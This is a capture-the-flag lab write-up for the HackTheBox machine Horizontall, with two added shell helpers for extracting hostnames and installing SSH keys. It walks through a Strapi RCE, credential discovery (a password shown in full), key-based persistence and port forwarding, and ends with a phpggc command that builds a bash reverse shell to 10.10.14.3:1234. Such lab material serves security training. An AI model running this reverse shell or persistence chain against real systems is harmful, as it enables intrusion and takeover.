HackTheBox | Horizontall
2022-08-08 13:34:00 【xxL7-】
Horizontall
nmap scan: ports 22 and 80 are open; port 80 serves the site http://horizontall.htb
Visit port 80.
dirsearch also turns up nothing.
After reading a writeup (wp), I learned that a new domain name appears in the JavaScript file returned in the response, although I still can't find it myself.
Visit http://api-prod.horizontall.htb/
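Added example (not part of the original writeup): a small shell helper that does the step above mechanically, pulling every hostname under the target's base domain out of a JavaScript bundle and producing the /etc/hosts line to append. The JS snippet inside it is constructed for the demo; the real bundle is whatever the site returns.

```shell
# Added example, not from the original writeup: extract in-scope hostnames from a JS bundle.
set -eu

# extract_hosts FILE BASE_DOMAIN
# Prints every distinct hostname in FILE ending in BASE_DOMAIN, one per line, sorted.
extract_hosts() {
  file="$1"; base="$2"
  # Escape the dots of the base domain so they match literally in the regex.
  esc_base=$(printf '%s' "$base" | sed 's/\./\\./g')
  grep -oE "(https?://)?[A-Za-z0-9.-]+\.${esc_base}" "$file" \
    | sed -E 's#^https?://##' \
    | sort -u
}

# hosts_line IP FILE BASE_DOMAIN
# Builds the line to append to /etc/hosts: the base domain plus every hostname found in FILE.
hosts_line() {
  ip="$1"; file="$2"; base="$3"
  printf '%s %s' "$ip" "$base"
  extract_hosts "$file" "$base" | while IFS= read -r h; do printf ' %s' "$h"; done
  printf '\n'
}

# Constructed sample of a minified bundle (not the machine's real file). It references the
# API host twice and an out-of-scope CDN host, to show de-duplication and scoping.
SAMPLE_JS=$(mktemp)
cat > "$SAMPLE_JS" <<'EOF'
(function(){var e="http://api-prod.horizontall.htb/reviews";fetch(e).then(r=>r.json());
var f="api-prod.horizontall.htb";var cdn="https://cdn.example.com/app.js";})();
EOF

extract_hosts "$SAMPLE_JS" horizontall.htb
hosts_line 10.10.11.105 "$SAMPLE_JS" horizontall.htb
```

Run it against the downloaded bundle instead of the sample file, then append the printed line with `sudo tee -a /etc/hosts` before visiting the new host.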
Find an admin path; visiting it redirects to a login page, which shows the site runs the Strapi CMS.
The familiar routine: Google for an exploit, which turns up an RCE.
Running the script gives RCE, but nothing is echoed back (blind execution).
So spawn a reverse shell directly.
Check /etc/passwd and see the developer user.
The strapi user can read user.txt in the developer user's home directory directly.
Checking locally, MySQL is running.
Looking for a way to log in to MySQL, I find a set of credentials in database.json under /opt/strapi/myapi/config/environments/development:
> developer/#J!:F9Zt2u
But this password does not log in to the developer's SSH, so I start from the database. Eventually I find the hashed value of Strapi's administrator password in the database.
Cracking it with John produced nothing.
Going back over the earlier enumeration, I find that ports 1337 and 8000 are also listening locally. Probing the services on both ports shows Laravel running on 8000.
Write an SSH public key in preparation for port forwarding later: run ssh-keygen locally to generate id_rsa.pub, then write its contents into .ssh/authorized_keys in the strapi user's home directory.
Set up SSH port forwarding locally, forwarding 127.0.0.1:8000 on the 10.10.11.105 host to local port 8000.
Now visiting local port 8000 reaches the Laravel service on port 8000 of 10.10.11.105; the version is v8.
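Added example (not part of the original writeup): the key installation and forwarding steps above as reusable shell functions. The key installer is idempotent and sets the permissions sshd's StrictModes insists on (a world-readable authorized_keys or a loose .ssh directory silently makes key login fail), and the second function prints the exact local-forward command. User, host and ports are the writeup's; the key string is a constructed dummy, not a real key, and the demo home directory is a temp dir standing in for the strapi user's home.

```shell
# Added example, not from the original writeup: idempotent authorized_keys install + ssh -L command.
set -eu

# install_pubkey HOME_DIR PUBKEY_LINE
# Appends PUBKEY_LINE to HOME_DIR/.ssh/authorized_keys unless an identical line already exists,
# and enforces 700 on .ssh and 600 on authorized_keys so sshd (StrictModes yes) accepts the file.
install_pubkey() {
  home="$1"; key="$2"
  mkdir -p "$home/.ssh"
  chmod 700 "$home/.ssh"
  touch "$home/.ssh/authorized_keys"
  chmod 600 "$home/.ssh/authorized_keys"
  if ! grep -qxF -- "$key" "$home/.ssh/authorized_keys"; then
    printf '%s\n' "$key" >> "$home/.ssh/authorized_keys"
  fi
}

# forward_cmd USER HOST REMOTE_PORT LOCAL_PORT KEYFILE
# Prints the ssh command that exposes REMOTE_PORT (bound to 127.0.0.1 on HOST) as LOCAL_PORT on
# the attacking machine. -N runs no remote command; the tunnel stays in the foreground so it is
# easy to tear down with Ctrl-C when finished.
forward_cmd() {
  printf 'ssh -i %s -N -L %s:127.0.0.1:%s %s@%s\n' "$5" "$4" "$3" "$1" "$2"
}

# Constructed demo: install a dummy key into a temporary home twice; it is recorded only once.
# On the target, HOME_DIR would be the strapi user's home directory.
DEMO_HOME=$(mktemp -d)
DEMO_KEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDUMMYKEYFORDEMOONLY00000000000000000000000 attacker@kali'
install_pubkey "$DEMO_HOME" "$DEMO_KEY"
install_pubkey "$DEMO_HOME" "$DEMO_KEY"
cat "$DEMO_HOME/.ssh/authorized_keys"
forward_cmd strapi 10.10.11.105 8000 8000 "$HOME/.ssh/id_rsa"
```

On the box, paste the output of `cat ~/.ssh/id_rsa.pub` from the attacking machine as PUBKEY_LINE in the reverse shell; afterwards `http://127.0.0.1:8000` locally is the target's Laravel instance.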
Laravel has a known CVE that came up in a previous box, so I went straight to an existing exploit:
https://github.com/ambionics/laravel-exploits
This gives root privileges directly.
Reverse shell payload, built with phpggc (the resulting phar is what the exploit delivers):
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/1234 0>&1'"